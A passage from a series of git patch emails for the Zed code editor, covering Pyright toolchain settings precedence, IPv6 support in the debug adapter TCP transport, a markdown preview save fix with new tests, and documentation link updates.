Release Notes: - N/A --- crates/activity_indicator/src/activity_indicator.rs | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/crates/activity_indicator/src/activity_indicator.rs b/crates/activity_indicator/src/activity_indicator.rs index 7aa5b91a4c2f7f..0abb0622f9e64f 100644 --- a/crates/activity_indicator/src/activity_indicator.rs +++ b/crates/activity_indicator/src/activity_indicator.rs @@ -729,13 +729,7 @@ impl Render for ActivityIndicator { } }) .label_size(LabelSize::Small) - .when(content.icon.is_some(), |this| { - this.start_icon( - Icon::new(IconName::LoadCircle) - .color(Color::Muted) - .size(IconSize::Small), - ) - }) + .loading(content.icon.is_some()) .map(|button| { if truncate_content { button.tooltip(Tooltip::text(content.message)) From 663fa80300a77faf9beddb3d7ff3c911e60e8ab9 Mon Sep 17 00:00:00 2001 From: Piotr Osiewicz <24362066+osiewicz@users.noreply.github.com> Date: Mon, 27 Apr 2026 10:40:41 +0200 Subject: [PATCH 039/231] python: Respect user settings for toolchain discovery over the toolchain set in Zed (#48262) Closes #46754 Release Notes: - python: User settings now take precedence over toolchain set in Zed for pyright/basedpyright --- crates/languages/src/python.rs | 30 +++++++++++++++++++++++++++++- 1 file changed, 29 insertions(+), 1 deletion(-) diff --git a/crates/languages/src/python.rs b/crates/languages/src/python.rs index 17a1d24be76559..dd059313b6d4f3 100644 --- a/crates/languages/src/python.rs +++ b/crates/languages/src/python.rs @@ -658,8 +658,22 @@ impl LspAdapter for PyrightLspAdapter { .and_then(|s| s.settings.clone()) .unwrap_or_default(); - // If we have a detected toolchain, configure Pyright to use it + // If we have a detected toolchain, configure Pyright to use it - unless the user sets it themselves. 
+ let should_insert_toolchain = || { + user_settings.as_object().is_none_or(|object| { + [ + "venvPath", + "venv", + "python", + "pythonPath", + "defaultInterpreterPath", + ] + .into_iter() + .any(|known_key| object.contains_key(known_key)) + }) + }; if let Some(toolchain) = toolchain + && should_insert_toolchain() && let Ok(env) = serde_json::from_value::(toolchain.as_json.clone()) { @@ -2075,7 +2089,21 @@ impl LspAdapter for BasedPyrightLspAdapter { .unwrap_or_default(); // If we have a detected toolchain, configure Pyright to use it + let should_insert_toolchain = || { + user_settings.as_object().is_none_or(|object| { + [ + "venvPath", + "venv", + "python", + "pythonPath", + "defaultInterpreterPath", + ] + .into_iter() + .any(|known_key| object.contains_key(known_key)) + }) + }; if let Some(toolchain) = toolchain + && should_insert_toolchain() && let Ok(env) = serde_json::from_value::< pet_core::python_environment::PythonEnvironment, >(toolchain.as_json.clone()) From f69fdfdc0619afb65f7acd3b553867a3349f5c4e Mon Sep 17 00:00:00 2001 From: moktamd <109174491+moktamd@users.noreply.github.com> Date: Mon, 27 Apr 2026 17:42:45 +0900 Subject: [PATCH 040/231] dap: Support IPv6 addresses in TCP transport (#52244) The DAP TCP transport layer was hardcoded to `Ipv4Addr`, so IPv6 addresses like `fd00::a` in a debug config's `connect.host` always failed with `hostname must be IPv4: invalid IPv4 address syntax`. Replaced `Ipv4Addr` with `IpAddr` and `SocketAddrV4` with `SocketAddr` across the `task`, `dap`, `dap_adapters`, and `project` crates. The WASM extension API still uses `u32` for the host field to avoid a breaking WIT interface change; IPv4 round-trips through extensions as before. Fixes #52237 Release Notes: - Fixed DAP TCP transport rejecting IPv6 addresses when connecting to remote debug adapters. 
--------- Co-authored-by: moktamd --- crates/dap/src/adapters.rs | 4 ++-- crates/dap/src/dap.rs | 4 ++-- crates/dap/src/transport.rs | 10 ++++---- crates/dap_adapters/src/python.rs | 12 +++++----- .../src/wasm_host/wit/since_v0_8_0.rs | 23 ++++++++++++++----- crates/project/src/debugger/dap_store.rs | 4 ++-- crates/project/src/debugger/session.rs | 4 ++-- crates/task/src/debug_format.rs | 12 +++++----- 8 files changed, 42 insertions(+), 31 deletions(-) diff --git a/crates/dap/src/adapters.rs b/crates/dap/src/adapters.rs index 96a35bc8ab66c4..0f4bb937c1b0a9 100644 --- a/crates/dap/src/adapters.rs +++ b/crates/dap/src/adapters.rs @@ -18,7 +18,7 @@ use std::{ borrow::Borrow, ffi::OsStr, fmt::Debug, - net::Ipv4Addr, + net::IpAddr, ops::Deref, path::{Path, PathBuf}, sync::Arc, @@ -106,7 +106,7 @@ impl<'a> From<&'a str> for DebugAdapterName { #[derive(Debug, Clone, PartialEq, Serialize)] pub struct TcpArguments { - pub host: Ipv4Addr, + pub host: IpAddr, pub port: u16, pub timeout: Option, } diff --git a/crates/dap/src/dap.rs b/crates/dap/src/dap.rs index 10a584e61b83f6..72446d86f0c187 100644 --- a/crates/dap/src/dap.rs +++ b/crates/dap/src/dap.rs @@ -6,7 +6,7 @@ pub mod proto_conversions; mod registry; pub mod transport; -use std::net::Ipv4Addr; +use std::net::IpAddr; pub use dap_types::*; use debugger_settings::DebuggerSettings; @@ -26,7 +26,7 @@ use task::{DebugScenario, TcpArgumentsTemplate}; pub async fn configure_tcp_connection( tcp_connection: TcpArgumentsTemplate, -) -> anyhow::Result<(Ipv4Addr, u16, Option)> { +) -> anyhow::Result<(IpAddr, u16, Option)> { let host = tcp_connection.host(); let timeout = tcp_connection.timeout; diff --git a/crates/dap/src/transport.rs b/crates/dap/src/transport.rs index 2bb55af74ec6ff..ff04c414517dcd 100644 --- a/crates/dap/src/transport.rs +++ b/crates/dap/src/transport.rs @@ -18,7 +18,7 @@ use smol::{ }; use std::{ collections::HashMap, - net::{Ipv4Addr, SocketAddrV4}, + net::{IpAddr, SocketAddr}, process::Stdio, sync::Arc, 
time::Duration, @@ -472,7 +472,7 @@ impl TransportDelegate { pub struct TcpTransport { executor: BackgroundExecutor, pub port: u16, - pub host: Ipv4Addr, + pub host: IpAddr, pub timeout: u64, process: Arc>>, _stderr_task: Option>, @@ -489,8 +489,8 @@ impl TcpTransport { } } - pub async fn unused_port(host: Ipv4Addr) -> Result { - Ok(TcpListener::bind(SocketAddrV4::new(host, 0)) + pub async fn unused_port(host: IpAddr) -> Result { + Ok(TcpListener::bind(SocketAddr::new(host, 0)) .await? .local_addr()? .port()) @@ -598,7 +598,7 @@ impl Transport for TcpTransport { > { let executor = self.executor.clone(); let timeout = self.timeout; - let address = SocketAddrV4::new(self.host, self.port); + let address = SocketAddr::new(self.host, self.port); let process = self.process.clone(); executor.clone().spawn(async move { select! { diff --git a/crates/dap_adapters/src/python.rs b/crates/dap_adapters/src/python.rs index 111eab5a1d1bf4..07eed167e696ee 100644 --- a/crates/dap_adapters/src/python.rs +++ b/crates/dap_adapters/src/python.rs @@ -14,7 +14,7 @@ use smol::fs::File; use smol::io::AsyncReadExt; use smol::lock::OnceCell; use std::ffi::OsString; -use std::net::Ipv4Addr; +use std::net::IpAddr; use std::str::FromStr; use std::{ ffi::OsStr, @@ -42,7 +42,7 @@ impl PythonDebugAdapter { const LANGUAGE_NAME: &'static str = "Python"; async fn generate_debugpy_arguments<'a>( - host: &'a Ipv4Addr, + host: &'a IpAddr, port: u16, launch_mode: DebugpyLaunchMode<'a>, user_installed_path: Option<&'a Path>, @@ -380,7 +380,7 @@ impl PythonDebugAdapter { } if let Some(hostname) = config_host { - tcp_connection.host = Some(hostname.parse().context("hostname must be IPv4")?); + tcp_connection.host = Some(hostname.parse().context("invalid IP address")?); } tcp_connection.port = config_port; DebugpyLaunchMode::AttachWithConnect { host: config_host } @@ -974,7 +974,7 @@ mod tests { .contains("Cannot have two different ports") ); - let host = Ipv4Addr::new(127, 0, 0, 1); + let host = 
IpAddr::V4(std::net::Ipv4Addr::LOCALHOST); let config_with_host_conflict = json!({ "request": "attach", "connect": { @@ -1018,7 +1018,7 @@ mod tests { #[gpui::test] async fn test_attach_with_connect_mode_generates_correct_arguments() { - let host = Ipv4Addr::new(127, 0, 0, 1); + let host = IpAddr::V4(std::net::Ipv4Addr::LOCALHOST); let port = 5678; let args_without_host = PythonDebugAdapter::generate_debugpy_arguments( @@ -1071,7 +1071,7 @@ mod tests { #[gpui::test] async fn test_debugpy_install_path_cases() { - let host = Ipv4Addr::new(127, 0, 0, 1); + let host = IpAddr::V4(std::net::Ipv4Addr::LOCALHOST); let port = 5678; // Case 1: User-defined debugpy path (highest precedence) diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs index 683e69e08704dc..24cf0affd77589 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs @@ -24,7 +24,7 @@ use project::project_settings::ProjectSettings; use semver::Version; use std::{ env, - net::Ipv4Addr, + net::{IpAddr, Ipv4Addr}, path::{Path, PathBuf}, str::FromStr, sync::{Arc, OnceLock}, @@ -117,7 +117,7 @@ impl TryFrom for extension::StartDebuggingReques impl From for extension::TcpArguments { fn from(value: TcpArguments) -> Self { Self { - host: value.host.into(), + host: IpAddr::V4(Ipv4Addr::from_bits(value.host)), port: value.port, timeout: value.timeout, } @@ -127,7 +127,10 @@ impl From for extension::TcpArguments { impl From for TcpArgumentsTemplate { fn from(value: extension::TcpArgumentsTemplate) -> Self { Self { - host: value.host.map(Ipv4Addr::to_bits), + host: value.host.and_then(|addr| match addr { + IpAddr::V4(v4) => Some(v4.to_bits()), + IpAddr::V6(_) => None, + }), port: value.port, timeout: value.timeout, } @@ -137,7 +140,7 @@ impl From for TcpArgumentsTemplate { impl From for extension::TcpArgumentsTemplate { fn from(value: TcpArgumentsTemplate) -> Self { Self { - 
host: value.host.map(Ipv4Addr::from_bits), + host: value.host.map(|bits| IpAddr::V4(Ipv4Addr::from_bits(bits))), port: value.port, timeout: value.timeout, } @@ -904,13 +907,21 @@ impl dap::Host for WasmState { let (host, port, timeout) = ::dap::configure_tcp_connection(task::TcpArgumentsTemplate { port: template.port, - host: template.host.map(Ipv4Addr::from_bits), + host: template + .host + .map(|bits| IpAddr::V4(Ipv4Addr::from_bits(bits))), timeout: template.timeout, }) .await?; + let host_bits = match host { + IpAddr::V4(v4) => v4.to_bits(), + IpAddr::V6(_) => { + anyhow::bail!("IPv6 addresses are not supported in the extension API") + } + }; Ok(TcpArguments { port, - host: host.to_bits(), + host: host_bits, timeout, }) }) diff --git a/crates/project/src/debugger/dap_store.rs b/crates/project/src/debugger/dap_store.rs index 6d320bc06e69ba..7ac9c02fe4fbf2 100644 --- a/crates/project/src/debugger/dap_store.rs +++ b/crates/project/src/debugger/dap_store.rs @@ -47,7 +47,7 @@ use std::{ borrow::Borrow, collections::BTreeMap, ffi::OsStr, - net::Ipv4Addr, + net::{IpAddr, Ipv4Addr}, path::{Path, PathBuf}, sync::{Arc, Once}, }; @@ -323,7 +323,7 @@ impl DapStore { let port_forwarding; let connection; if let Some(c) = binary.connection { - let host = Ipv4Addr::LOCALHOST; + let host = IpAddr::V4(Ipv4Addr::LOCALHOST); let port; if remote.read_with(cx, |remote, _cx| remote.shares_network_interface()) { port = c.port; diff --git a/crates/project/src/debugger/session.rs b/crates/project/src/debugger/session.rs index 87e11cfd97a2f6..feba6ff5520681 100644 --- a/crates/project/src/debugger/session.rs +++ b/crates/project/src/debugger/session.rs @@ -48,7 +48,7 @@ use serde_json::Value; use smol::net::{TcpListener, TcpStream}; use std::any::TypeId; use std::collections::{BTreeMap, VecDeque}; -use std::net::Ipv4Addr; +use std::net::{IpAddr, Ipv4Addr}; use std::ops::RangeInclusive; use std::path::PathBuf; use std::time::Duration; @@ -2901,7 +2901,7 @@ impl Session { ); None } else { - 
let port = TcpTransport::unused_port(Ipv4Addr::LOCALHOST) + let port = TcpTransport::unused_port(IpAddr::V4(Ipv4Addr::LOCALHOST)) .await .context("getting port for DAP")?; request diff --git a/crates/task/src/debug_format.rs b/crates/task/src/debug_format.rs index 5609e2565c8497..72c12324c7350f 100644 --- a/crates/task/src/debug_format.rs +++ b/crates/task/src/debug_format.rs @@ -4,7 +4,7 @@ use gpui::SharedString; use log as _; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; -use std::net::Ipv4Addr; +use std::net::IpAddr; use std::path::PathBuf; use util::{debug_panic, schemars::add_new_subschema}; @@ -20,7 +20,7 @@ pub struct TcpArgumentsTemplate { /// The host that the debug adapter is listening too /// /// Default: 127.0.0.1 - pub host: Option, + pub host: Option, /// The max amount of time in milliseconds to connect to a tcp DAP before returning an error /// /// Default: 2000ms @@ -29,8 +29,9 @@ pub struct TcpArgumentsTemplate { impl TcpArgumentsTemplate { /// Get the host or fallback to the default host - pub fn host(&self) -> Ipv4Addr { - self.host.unwrap_or_else(|| Ipv4Addr::new(127, 0, 0, 1)) + pub fn host(&self) -> IpAddr { + self.host + .unwrap_or(IpAddr::V4(std::net::Ipv4Addr::LOCALHOST)) } pub fn from_proto(proto: proto::TcpHost) -> Result { @@ -389,8 +390,7 @@ impl DebugTaskFile { }, "host": { "type": "string", - "pattern": "^((25[0-5]|(2[0-4]|1\\d|[1-9]|)\\d)\\.?\\b){4}$", - "description": "The host that the debug adapter is listening to (default: 127.0.0.1)" + "description": "The host that the debug adapter is listening to, as an IPv4 or IPv6 address (default: 127.0.0.1)" }, "timeout": { "type": "integer", From c478bc28da8c5118765fbcd77d4f5c7593fa3361 Mon Sep 17 00:00:00 2001 From: Pronsh <105874877+Priyansh4444@users.noreply.github.com> Date: Mon, 27 Apr 2026 01:47:27 -0700 Subject: [PATCH 041/231] markdown_preview: Fix Ctrl+S saving checkbox toggle state (#53236) Changes Made: - Adding the `Item::can_save()`, `save()`, `save_as()`, 
`can_save_as()` functions to help the Editor save when a checkbox is toggled - Small refactor to seperate checkbox toggle and refreshing preview - Adding support for both `/...` and `\\...` for windows users. [NOTE: I no longer own a window's machine and I am unsure if this is correct, and will fix it immediately if this is wrong] - Resolving preview paths, strips out the fragment, and image paths are coalesced to None if they don't exist - Adding Tests for the added behaviour [NOTE: would love feedback since this is the first time I am writing tests, and had a bit of assistance from an AI, but manually reviewed the code and ran the application and it seemed fine] Self-Review Checklist: - [X] I've reviewed my own diff for quality, security, and reliability - [X] Unsafe blocks (if any) have justifying comments - [X] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [X] Tests cover the new/changed behavior - [X] Performance impact has been considered and is acceptable Closes #46901 Release Notes: - Fixed Crtl+S saving while toggling checkbox in preview mode --- Cargo.lock | 2 + crates/markdown_preview/Cargo.toml | 5 + .../src/markdown_preview_view.rs | 366 ++++++++++++++---- 3 files changed, 288 insertions(+), 85 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index f825e9f2bc60c5..44cff847bb9799 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -10430,11 +10430,13 @@ version = "0.1.0" dependencies = [ "anyhow", "editor", + "fs", "gpui", "language", "log", "markdown", "project", + "serde_json", "settings", "tempfile", "theme", diff --git a/crates/markdown_preview/Cargo.toml b/crates/markdown_preview/Cargo.toml index bdb90deb19ce13..9b978ce14f507b 100644 --- a/crates/markdown_preview/Cargo.toml +++ b/crates/markdown_preview/Cargo.toml @@ -32,4 +32,9 @@ workspace.workspace = true zed_actions.workspace = true [dev-dependencies] +editor = { workspace = true, features = ["test-support"] } 
+fs.workspace = true +gpui = { workspace = true, features = ["test-support"] } +serde_json.workspace = true tempfile.workspace = true +workspace = { workspace = true, features = ["test-support"] } diff --git a/crates/markdown_preview/src/markdown_preview_view.rs b/crates/markdown_preview/src/markdown_preview_view.rs index f8c9df8dbdf5b7..76b46a520d5391 100644 --- a/crates/markdown_preview/src/markdown_preview_view.rs +++ b/crates/markdown_preview/src/markdown_preview_view.rs @@ -18,6 +18,7 @@ use markdown::{ CodeBlockRenderer, CopyButtonVisibility, Markdown, MarkdownElement, MarkdownFont, MarkdownOptions, MarkdownStyle, }; +use project::Project; use project::search::SearchQuery; use settings::Settings; use theme::{SystemAppearance, Theme, ThemeRegistry}; @@ -25,7 +26,7 @@ use theme_settings::ThemeSettings; use ui::{ContextMenu, WithScrollbar, prelude::*, right_click_menu}; use util::markdown::split_local_url_fragment; use util::normalize_path; -use workspace::item::{Item, ItemBufferKind, ItemHandle}; +use workspace::item::{Item, ItemBufferKind, ItemHandle, SaveOptions}; use workspace::searchable::{ Direction, SearchEvent, SearchOptions, SearchToken, SearchableItem, SearchableItemHandle, }; @@ -665,27 +666,62 @@ impl MarkdownPreviewView { } }) .on_checkbox_toggle(move |source_range, new_checked, window, cx| { - let task_marker = if new_checked { "[x]" } else { "[ ]" }; - editor_for_checkbox.update(cx, |editor, cx| { - editor.edit( - [( - MultiBufferOffset(source_range.start) - ..MultiBufferOffset(source_range.end), - task_marker, - )], - cx, - ); - }); - if let Some(view) = view_handle.upgrade() { - cx.update_entity(&view, |this, cx| { - this.update_markdown_from_active_editor(false, false, window, cx); - }); - } + Self::apply_checkbox_toggle_to_editor( + &editor_for_checkbox, + source_range, + new_checked, + cx, + ); + Self::refresh_preview(view_handle.clone(), window, cx); }); } markdown_element } + + fn apply_checkbox_toggle_to_editor( + editor: &Entity, + 
source_range: std::ops::Range, + new_checked: bool, + cx: &mut App, + ) { + let task_marker = if new_checked { "[x]" } else { "[ ]" }; + let expected_existing_marker = if new_checked { "[ ]" } else { "[x]" }; + + editor.update(cx, |editor, cx| { + let existing_marker: String = editor + .buffer() + .read(cx) + .snapshot(cx) + .text_for_range( + MultiBufferOffset(source_range.start)..MultiBufferOffset(source_range.end), + ) + .collect(); + + debug_assert_eq!(existing_marker, expected_existing_marker); + + editor.edit( + [( + MultiBufferOffset(source_range.start)..MultiBufferOffset(source_range.end), + task_marker, + )], + cx, + ); + }); + } + + fn refresh_preview(view_handle: WeakEntity, window: &mut Window, cx: &mut App) { + if let Some(view) = view_handle.upgrade() { + let preview_is_focused = view.read(cx).focus_handle.contains_focused(window, cx); + if !preview_is_focused { + return; + } + + cx.update_entity(&view, |this, cx| { + this.update_markdown_from_active_editor(false, false, window, cx); + }); + } + } } fn handle_url_click( @@ -745,7 +781,9 @@ fn open_preview_url( window: &mut Window, cx: &mut App, ) { - if let Some(path) = resolve_preview_path(url.as_ref(), base_directory.as_deref()) + let (path_text, _) = split_preview_url(url.as_ref()); + + if let Some(path) = resolve_preview_path(path_text, base_directory.as_deref()) && let Some(workspace) = workspace.upgrade() { let _ = workspace.update(cx, |workspace, cx| { @@ -767,14 +805,22 @@ fn open_preview_url( cx.open_url(url.as_ref()); } +fn split_preview_url(url: &str) -> (&str, Option<&str>) { + match url.split_once('#') { + Some((path, fragment)) => (path, Some(fragment)), + None => (url, None), + } +} + fn resolve_preview_path(url: &str, base_directory: Option<&Path>) -> Option { if url.starts_with("http://") || url.starts_with("https://") { return None; } - let decoded_url = urlencoding::decode(url) + let (path_text, _) = split_preview_url(url); + let decoded_url = urlencoding::decode(path_text) 
.map(|decoded| decoded.into_owned()) - .unwrap_or_else(|_| url.to_string()); + .unwrap_or_else(|_| path_text.to_string()); let candidate = PathBuf::from(&decoded_url); if candidate.is_absolute() && candidate.exists() { @@ -809,15 +855,18 @@ fn resolve_preview_image( .map(|decoded| decoded.into_owned()) .unwrap_or_else(|_| dest_url.to_string()); - let decoded_path = Path::new(&decoded); - - if let Ok(relative_path) = decoded_path.strip_prefix("/") { + if let Some(stripped) = ['/', '\\'] + .iter() + .find_map(|prefix| decoded.strip_prefix(*prefix)) + { if let Some(root) = workspace_directory { - let absolute_path = root.join(relative_path); + let absolute_path = root.join(stripped); if absolute_path.exists() { return Some(ImageSource::Resource(Resource::Path(Arc::from( absolute_path.as_path(), )))); + } else { + return None; } } } @@ -828,9 +877,8 @@ fn resolve_preview_image( base_directory?.join(decoded) }; - Some(ImageSource::Resource(Resource::Path(Arc::from( - path.as_path(), - )))) + path.exists() + .then(|| ImageSource::Resource(Resource::Path(Arc::from(path.as_path())))) } impl Focusable for MarkdownPreviewView { @@ -881,6 +929,52 @@ impl Item for MarkdownPreviewView { Some("Markdown Preview Opened") } + fn can_save(&self, cx: &App) -> bool { + self.active_editor + .as_ref() + .is_some_and(|editor_state| editor_state.editor.read(cx).can_save(cx)) + } + + fn can_save_as(&self, cx: &App) -> bool { + self.active_editor + .as_ref() + .is_some_and(|editor_state| editor_state.editor.read(cx).can_save_as(cx)) + } + + fn save( + &mut self, + options: SaveOptions, + project: Entity, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + self.active_editor + .as_ref() + .map(|editor_state| { + editor_state + .editor + .update(cx, |editor, cx| editor.save(options, project, window, cx)) + }) + .unwrap_or_else(|| Task::ready(Ok(()))) + } + + fn save_as( + &mut self, + project: Entity, + path: project::ProjectPath, + window: &mut Window, + cx: &mut Context, + ) -> 
Task> { + self.active_editor + .as_ref() + .map(|editor_state| { + editor_state + .editor + .update(cx, |editor, cx| editor.save_as(project, path, window, cx)) + }) + .unwrap_or_else(|| Task::ready(Ok(()))) + } + fn to_item_events(_event: &Self::Event, _f: &mut dyn FnMut(workspace::item::ItemEvent)) {} fn buffer_kind(&self, _cx: &App) -> ItemBufferKind { @@ -1095,98 +1189,200 @@ mod tests { use crate::markdown_preview_view::ImageSource; use crate::markdown_preview_view::Resource; use crate::markdown_preview_view::resolve_preview_image; - use anyhow::Result; - use std::fs; - use tempfile::TempDir; + use editor::Editor; + use gpui::{Entity, TestAppContext}; + use serde_json::json; + use std::path::PathBuf; + use std::sync::Arc; + use util::path; + use util::test::TempTree; + use workspace::{AppState, MultiWorkspace, SaveIntent, Workspace, open_paths}; - use super::resolve_preview_path; + use super::{MarkdownPreviewView, resolve_preview_path}; #[test] - fn resolves_relative_preview_paths() -> Result<()> { - let temp_dir = TempDir::new()?; - let base_directory = temp_dir.path(); + fn resolves_relative_preview_path_and_missing_cases() { + let tree = markdown_fixture_tree(json!({ + "notes.md": "# Notes" + })); + let base_directory = markdown_fixture_directory(&tree); let file = base_directory.join("notes.md"); - fs::write(&file, "# Notes")?; assert_eq!( - resolve_preview_path("notes.md", Some(base_directory)), + resolve_preview_path("notes.md", Some(base_directory.as_path())), Some(file) ); assert_eq!( - resolve_preview_path("nonexistent.md", Some(base_directory)), + resolve_preview_path("nonexistent.md", Some(base_directory.as_path())), None ); assert_eq!(resolve_preview_path("notes.md", None), None); - - Ok(()) } #[test] - fn resolves_urlencoded_preview_paths() -> Result<()> { - let temp_dir = TempDir::new()?; - let base_directory = temp_dir.path(); - let file = base_directory.join("release notes.md"); - fs::write(&file, "# Release Notes")?; + fn 
resolves_urlencoded_preview_path_and_ignores_fragment_component() { + let tree = markdown_fixture_tree(json!({ + "release notes.md": "# Release Notes", + "notes.md": "# Notes" + })); + let base_directory = markdown_fixture_directory(&tree); assert_eq!( - resolve_preview_path("release%20notes.md", Some(base_directory)), - Some(file) + resolve_preview_path( + "release%20notes.md#overview", + Some(base_directory.as_path()) + ), + Some(base_directory.join("release notes.md")) + ); + assert_eq!( + resolve_preview_path("notes.md#L10", Some(base_directory.as_path())), + Some(base_directory.join("notes.md")) ); - - Ok(()) } #[test] - fn resolves_workspace_absolute_preview_images() -> Result<()> { - let temp_dir = TempDir::new()?; - let workspace_directory = temp_dir.path(); - - let base_directory = workspace_directory.join("docs"); - fs::create_dir_all(&base_directory)?; + fn does_not_treat_web_links_as_preview_files() { + assert_eq!(resolve_preview_path("https://zed.dev", None), None); + assert_eq!(resolve_preview_path("http://example.com", None), None); + } + #[test] + fn resolves_workspace_absolute_preview_image_path_and_rejects_missing() { + let tree = TempTree::new(json!({ + "docs": {}, + "test_image.png": "mock data" + })); + let workspace_directory = tree.path(); + let base_directory = markdown_fixture_directory(&tree); let image_file = workspace_directory.join("test_image.png"); - fs::write(&image_file, "mock data")?; - let resolved_success = resolve_preview_image( - "/test_image.png", - Some(&base_directory), - Some(workspace_directory), - ); - - match resolved_success { - Some(ImageSource::Resource(Resource::Path(p))) => { - assert_eq!(p.as_ref(), image_file.as_path()); - } - _ => panic!("Expected successful resolution to be a Resource::Path"), + for workspace_root_relative_path in ["/test_image.png", "\\test_image.png"] { + let resolved = resolve_preview_image( + workspace_root_relative_path, + Some(&base_directory), + Some(workspace_directory), + ); + 
assert_resolved_preview_image_path(resolved, image_file.as_path()); } - let resolved_missing = resolve_preview_image( + let missing = resolve_preview_image( "/missing_image.png", Some(&base_directory), Some(workspace_directory), ); + assert!(missing.is_none()); + } - let expected_missing_path = if std::path::Path::new("/missing_image.png").is_absolute() { - std::path::PathBuf::from("/missing_image.png") - } else { - // join is to retain windows path prefix C:/ - #[expect(clippy::join_absolute_paths)] - base_directory.join("/missing_image.png") - }; + #[gpui::test] + async fn toggles_task_checkbox_and_saves_when_preview_is_active(cx: &mut TestAppContext) { + let app_state = init_test(cx); + app_state + .fs + .as_fake() + .insert_tree( + path!("/dir"), + json!({ + "todo.md": "- [ ] Finish work\n" + }), + ) + .await; - match resolved_missing { - Some(ImageSource::Resource(Resource::Path(p))) => { - assert_eq!(p.as_ref(), expected_missing_path.as_path()); - } - _ => panic!("Expected missing file to fallback to a Resource::Path"), - } + cx.update(|cx| { + open_paths( + &[PathBuf::from(path!("/dir/todo.md"))], + app_state.clone(), + workspace::OpenOptions::default(), + cx, + ) + }) + .await + .unwrap(); + + let multi_workspace = cx.update(|cx| cx.windows()[0].downcast::().unwrap()); + let preview = multi_workspace + .update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace.workspace().clone(); + let editor: Entity = workspace + .read(cx) + .active_item(cx) + .and_then(|item| item.act_as::(cx)) + .unwrap(); + + workspace.update(cx, |workspace, cx| { + let preview = MarkdownPreviewView::create_markdown_view( + workspace, + editor.clone(), + window, + cx, + ); + workspace.active_pane().update(cx, |pane, cx| { + pane.add_item(Box::new(preview.clone()), true, true, None, window, cx) + }); + preview + }) + }) + .unwrap(); + cx.run_until_parked(); + + let save_task = multi_workspace + .update(cx, |multi_workspace, window, cx| { + let workspace: Entity = 
multi_workspace.workspace().clone(); + let view_handle = preview.downgrade(); + assert!(preview.read(cx).focus_handle.contains_focused(window, cx)); + preview.update(cx, |preview, cx| { + let editor = preview.active_editor.as_ref().unwrap().editor.clone(); + MarkdownPreviewView::apply_checkbox_toggle_to_editor(&editor, 2..5, true, cx); + }); + MarkdownPreviewView::refresh_preview(view_handle, window, cx); + + workspace.update(cx, |workspace: &mut Workspace, cx| { + workspace.save_active_item(SaveIntent::Save, window, cx) + }) + }) + .unwrap(); + + save_task.await.unwrap(); + cx.run_until_parked(); + + assert_eq!( + app_state + .fs + .load(path!("/dir/todo.md").as_ref()) + .await + .unwrap(), + "- [x] Finish work\n" + ); + } - Ok(()) + fn init_test(cx: &mut TestAppContext) -> Arc { + cx.update(|cx| { + let state = AppState::test(cx); + editor::init(cx); + crate::init(cx); + state + }) } - #[test] - fn does_not_treat_web_links_as_preview_paths() { - assert_eq!(resolve_preview_path("https://zed.dev", None), None); - assert_eq!(resolve_preview_path("http://example.com", None), None); + fn markdown_fixture_tree(docs_tree: serde_json::Value) -> TempTree { + TempTree::new(json!({ + "docs": docs_tree + })) + } + + fn markdown_fixture_directory(tree: &TempTree) -> PathBuf { + tree.path().join("docs") + } + + #[track_caller] + fn assert_resolved_preview_image_path( + resolved: Option, + expected_path: &std::path::Path, + ) { + match resolved { + Some(ImageSource::Resource(Resource::Path(path))) => { + assert_eq!(path.as_ref(), expected_path); + } + _ => panic!("Expected preview image to resolve to a local path"), + } } } From 9588124df49f189ffd9481c45a2402fb24e224a5 Mon Sep 17 00:00:00 2001 From: Kunall Banerjee Date: Mon, 27 Apr 2026 04:48:27 -0400 Subject: [PATCH 042/231] docs: Update broken references (#48608) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit I might turn this into a big PR with multiple fixes. 
So no, this is not going stale. I’m updating this as and when I find broken refs or stale content. Release Notes: - N/A --------- Co-authored-by: Marshall Bowers --- docs/src/ai/llm-providers.md | 2 +- docs/src/remote-development.md | 6 +----- 2 files changed, 2 insertions(+), 6 deletions(-) diff --git a/docs/src/ai/llm-providers.md b/docs/src/ai/llm-providers.md index ec217ff081351f..f5d6f345968434 100644 --- a/docs/src/ai/llm-providers.md +++ b/docs/src/ai/llm-providers.md @@ -282,7 +282,7 @@ Alternatively, you can provide an OAuth token via the `GH_COPILOT_TOKEN` environ > **Note**: If you don't see specific models in the dropdown, you may need to enable them in your [GitHub Copilot settings](https://github.com/settings/copilot/features). -To use Copilot Enterprise with Zed (for both agent and completions), you must configure your enterprise endpoint as described in [Configuring GitHub Copilot Enterprise](./edit-prediction.md#github-copilot-enterprise). +To use Copilot Enterprise with Zed (for both agent and completions), you must configure your enterprise endpoint as described in [Configuring GitHub Copilot Enterprise](./edit-prediction.md#using-github-copilot-enterprise). ### Google AI {#google-ai} diff --git a/docs/src/remote-development.md b/docs/src/remote-development.md index 4ea6c5856d43f8..9092de2cac33da 100644 --- a/docs/src/remote-development.md +++ b/docs/src/remote-development.md @@ -234,7 +234,7 @@ Each connection tries to run the development server in proxy mode. This mode wil In the case that reconnecting fails, the daemon will not be re-used. That said, unsaved changes are by default persisted locally, so that you do not lose work. You can always reconnect to the project at a later date and Zed will restore unsaved changes. -If you are struggling with connection issues, you should be able to see more information in the Zed log `cmd-shift-p Open Log`. 
